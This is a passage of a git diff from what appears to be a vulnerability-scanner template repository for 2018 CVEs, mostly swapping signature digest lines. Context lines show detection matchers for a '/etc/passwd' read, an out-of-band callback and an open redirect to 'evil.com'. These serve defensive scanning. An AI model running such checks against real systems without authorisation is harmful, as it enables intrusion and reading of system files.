490a0046304402202116b0240e73d65695dfbb33865db4678c8948c6cfa28cc54e56546c7938577e0220536e48f757f3a937c821d02c65518bcd90f9551f6f75785e658ed0d2e336f012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index ae9347d562..9092672f1f 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010a5110fcf69876c71781110fd5641dab9478cc7df88f493c139ba28bad322e5022100df7c6f092682225ead49187ce78932a02ffb1bee9aeefd7a6d4020417a1e9388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 80af352281..cca5eec202 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b7874aac20e7d89e436ded5af7b28b1129b0faab4a5cd265283adaca7f8dc2ec022100df15c3208c905590cc52452b6e7674b561f82b3d2abf64db204d482c9ea3e9a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba108c11778581627bbeac85d1539af59abaf822ff9c7740b86c7444e5dace29022100e409b55ce3441b315844356936324f621eec8b39a5ec0b16303eedbc58d9467e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 7bd191ae69..cbd950e35d 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220163e17333f693273f0184882f7c399fcda1b6449c662dc1cba74ee87808130ed02203aa357a2acab35a1d471dc8f4fa637f885b471263fcf8a5e8b18bddc364df596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 55fc0419dd..f6a55e3a22 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022075f90b8b71b6bd4a7d33a7251f3c5d9376101969a3988893ac15509a5ba0700502207f0935dd57fcbbbbf510ba7392af0ad2ec9b2ffbf9987665994cce00e9f727fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index ee8a6ead70..ab15cfd381 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -40,4 +40,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402204b79cea41b36e1523d218af7026b4340d8319f54351694e4091f8c6a29d3cab50220119a3010ac8263e31e2581b0a3f5c37f8b9b97f36886518b83b9164b35106409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b505af24e357311546c8a4a494a248180a1e6a98fd1a43f547164d50c8df1a330220773e22a98921c0d651164ccefc4d424b77d72e22da28bcff69a945e1d384777c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 7e496642c8..d18230ef1a 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f79dc7fa4d5658883c8d16adf628fc9af1d4ecdc514e147ebd9543ae8af4260e022006b79de622defc2acff6938eb4692430abce390ebfba791ed24158fb2dbbd4c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 01c140af69..0276a7408c 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100eea40286c8223d156eaa5b9563d409f201d684309cfc28007fec472510f2a53e022100b5200986c44866e61901e44d8eec175eec2ddf390947c5fd0053664e87029026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 3d573cf503..0c8c87aa62 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022057e095395515885d49bba75cc6973fbabdbf896cdd562264afe371b0b62a024f02205dba19fd54e7acbaa08e72ef776159642f3abe38b84a30c7aaebb48512e53533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 8ddb39b4bc..42be838d22 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200d20a234ee24057b8f565b53e9934c8530f3aef5c231996e6548aa1ed1bb6f8b0221008e92daeee65d0dfb8e5b759e287037313c3094f8d3aa4cc43c62e22429801481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index c73edd7384..507df95ba1 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220107beb1af83054f9a9af2a941d6770897f5df1aed760488592cce1aa511bb9ca0220758a93ca12ef34dd1899071bf994daf73542d6639b7c2cc333b5e9c6081b7ecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index de6cb5e711..3e90d08e09 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093eca11ebab690b724707e5d3854aad6efded48da439964a5bdbe285945eaf020221009d01df33ad6fd8af8c4ba896f1dfea396a51ea797cb4c6d1196b1f0e9cad623f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220796e5a1f1956c4523eb569daf5b1a0a1faebc2f72247418812931a5e68277d980220772cd55cfb046e365847adba5643a19a0e9462d49ac46b936262e094587b2f92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 2ecf3035bc..a3a30695fe 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100d5f2349395d7e18958ea5b9c9d28b05d55ab15715981e013f123d65d4de34d7302202329f9b7a950438d6c57a758755f711ea30247ce56f4d0babb2e1ef3d89ca219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bec0bd28d03a8668e238050338b250954c84ef14d63693d29d23164a96eb7940022100e7a8f25d4206e7b85164c393af308c6186954abe8b02b180e84a80b946227f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index d6baca488b..bcc16fdd8f 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220437b11ebe0039e74c86de59ceb9fdda453c75c128548904e7a1b422bdb009a2c02200f65f90a58af80d64500971c6dae5b9a80b0a54ca6488239ff44e1588e57e8a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 62d576c2c6..5880a66046 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a00473045022100cbbb368536375647c62a420ac0b3f4fab57bc778081177647c360b395cb72c5802203c4d1d3c22333cd7ede126c2952f699bc73351524636df543b4bda799891072a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 4229c61fc0..29cd045b1a 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http -# digest: 4a0a00473045022001bd6e92a9a4e68e7c45e54dcc1695e08b692f0f3c2c42de5daedfc86a3d0f02022100c4d285cf94370771e45fd331529211eb91ba1dfd01866d4366151ff3e2c19ecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 14ccf83922..375c7740ab 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,4 +38,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a004730450220119d9f5fa19852d6ebae4efa972681b71cc38ec1b88dbd2a9a14c78ce94957c3022100d49d899907c13dc62585b28ed21bc6ab2fb98b9d6167e449e38bbc266cc46dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 2cd1505517..dcf16683bf 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d15032f4f7ba8400fdaf1c0e9983a1254f74e2e35c98e9d5094375b57f8060c02202bc5cae53054abb24bdff331a52a2b61d66b6a766794fc5a9641414d9609dbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index b01ad025cd..d619183fcc 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -47,4 +47,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 4a0a00473045022100af7022759c9a36571af24c76109a3f36b321ea99e6e27d28d878ad59b4402fa902203f6d6287a825eacfa8c95959ebcee6fd5547867d56b5296c299b7b50c3481ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a613403e95cd869d597b3567f9774508802b578940d4923d3e724796ed4a51d022100e7705c676701af5b47545de5a166c31d2a905825dee9546405c3aa21ab76d712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index eac2464890..66bf5e553e 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -50,4 +50,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 4a0a004730450220022e246798972d56d2acf20f209330321b94af430486676f01f973fa99ed598d0221008f7e74edafd982b512a2395c9a44eed7898b15aceb5b9a0da216258fd3ecd1a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb761bd732caa4633175fb277ae6cb5413db1b1f38be0f5a60575eb0ac8fcc52022069ee62eab829a913c99b59cb9268d67426dd4012e8ebcaf33d69fe06bb0422de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 5b83da0c5a..ce8c147b8c 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c766f1703e5ba68f42ba9aeeeae764a68cce93b8ffe1142a31aa756ddfa7f35d022100cdf7e23edcfdeae00378ad2c761463a94a76397f0292e1bc103974e60e581ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 87c0badfda..d98d6b1447 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef3314056315e4aea16821be90bbddd3d6ed1139c73b31e8058bd84616f7a331022100c40f899c17ef92a18a84ccbfb0abf11dfadcaf83097c6d487b92ece5463d9dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index dfa7471efc..d47482ca8a 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c18429b3df39899215a6749447228f848fff33a976a360448c67e01a32aef22f0220663b413c5537dca793b988a998a617130508838787f1281466ad96c34f8e0c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 56931486bb..2a1cad77ca 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -49,4 +49,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 4a0a0047304502205a577571939c4469803d93f9d58ca0c6fe7d7781724726bd0be36d3c63857728022100f42acfffe18f8864227f9afb7200da7b28870395290ea3dd16823cd82b633b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index e248210fd4..8218daf197 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -53,4 +53,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100cb7a951d4ea256b3c26be5303e3c6025046a20944d4e2f92250ab2a566e2bbb2022100b912ca2e566a8f4e2cf8c72901116e0a42d1a7fc5eaadbcac0e88c21b9ec0dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index c86470ba5d..28743e3369 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -43,4 +43,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4b0a0048304602210099d1b452858f01c40dc313e91ab643b9042414e99cbbd467980dc0179336a354022100daa4d496f81e5da9f333b469091292eced2f7a797674176b4a8e94d348ebfb32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 1e4f28bea5..1a094a7556 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca7ed1082cfdba5563bdbd1b3dc533dd565615fe6a085a30befb5e2f75e5442d022100bd883a1061bf5478d99af8d1b40df6015f8b5b38d7fa411037031d3c1bef9bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index a6939da7a5..90ffe55585 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -46,4 +46,4 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and -# digest: 490a0046304402205f81700f29fc3e8c1d53470bb15cc819ecaa9f0f7b0d16d7bfdac6983336c4a602204014058d64cdb5ed486e9ea6bea085d646428eb48656227ed5b16d76b4eb95de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cbde343fd3e17d2ea27e336ffb9188c1b206ffddbca64133f60a51899fec8161022100f831ce4023cacc6cdc0e47b7d783b39f80685ce3a9dd5b1f475af144b8163794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index d8ed277549..c0b21f42aa 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040d49b58fb59c9313657d954c6cb9d9853ed0a1219039a095d03b96f0df8ea78022034828ea0a48b6ade7fb0ff0139eb15584563a87f498e25496e3a96a9613521fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 22905f6820..64fb92a805 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbfcb5749de296134aba843406d76defb3c8c77dbe4330d1cf0459ba00680aef02202999fd49f80dd9299e809d77abf6dd5c9708bec2ca09dda34414b956afe8fb03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 3c5f07bf77..5ba6bb99ba 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100891af8a1479681445d3c33a71898449a083ebdcb33fb6c37eedd3e26424de951022100d9fc09cd64c1664c479b0ae35ed756d701a3de0be44b8ed1b7e2a4d6e99b4516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 8566e600c0..2f28a6c448 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207123eb8e3f43f268cddc3bb273b66b20b3bf1f08874095623ad50e51430f0e59022052c81675e33da31853d4561f971afcdfb932a42ac21a884a96bb3d548b29e7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100809f2352b8438e48db6f5c41fb1b71b106d602293b0784723a774df69362d3b902205d554854a2db4dac5de03ccf4f72bf0c69a17fa8f5a6deabcea70cbdc609dedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 403adacffa..1b1f7330fd 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc6406c386aefb8b17a0f881562c51ce990456e94df8885750d3da08499565fc022100b45d32482083538007b5616a80a3a647b28d1dd5b2651d10d4946dc3fed30497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dde2f46dea081ad6ee497f625921fa627e85d86066f46bf0412c3baea3dee44c022100e29b218c3b2f0d942643f9520686a1c2ac7ffe7606193b38c7433e3006313eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index bde8f3a3cc..32940d4fec 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e7b60a1b8a2b988f27b9b94eb6ebdd04227209c8760ff9614ea4d40b20f576702201ac077a04cde1df9b2efbb25b2006f51eeb3c3bb72f5b476c2ef4defc3115a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 28bfdad1fd..568e65f5fe 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -43,4 +43,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# digest: 490a0046304402207fd84ac673936be426909401efa961668ef4fe0fcb94ea4bfd7b92096d55de4502202187a45507642ce028a12df0ac0966a1f0e2163c8d5e3489bef9b5a3da8f5d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index a94bf0f917..4d61e0aad1 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220105d6f46a7ce73f1bc3e5bffe609e031dc1809ad30ea5902fe949f94c27d54a5022048dc8c0ddb41ba06edc8deb2f6ad0dde83578e9d0b3edb1fb4576fad8bbee561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202aa2d37d93090e65caa5149dce628a5f34aaf844a03795a60118487af86ad41a022100948b4dfb7fbc394901fe1405320714bc046f960c82c84e7dd65bfd91b4001a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index b7c56024ba..6439455c7b 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 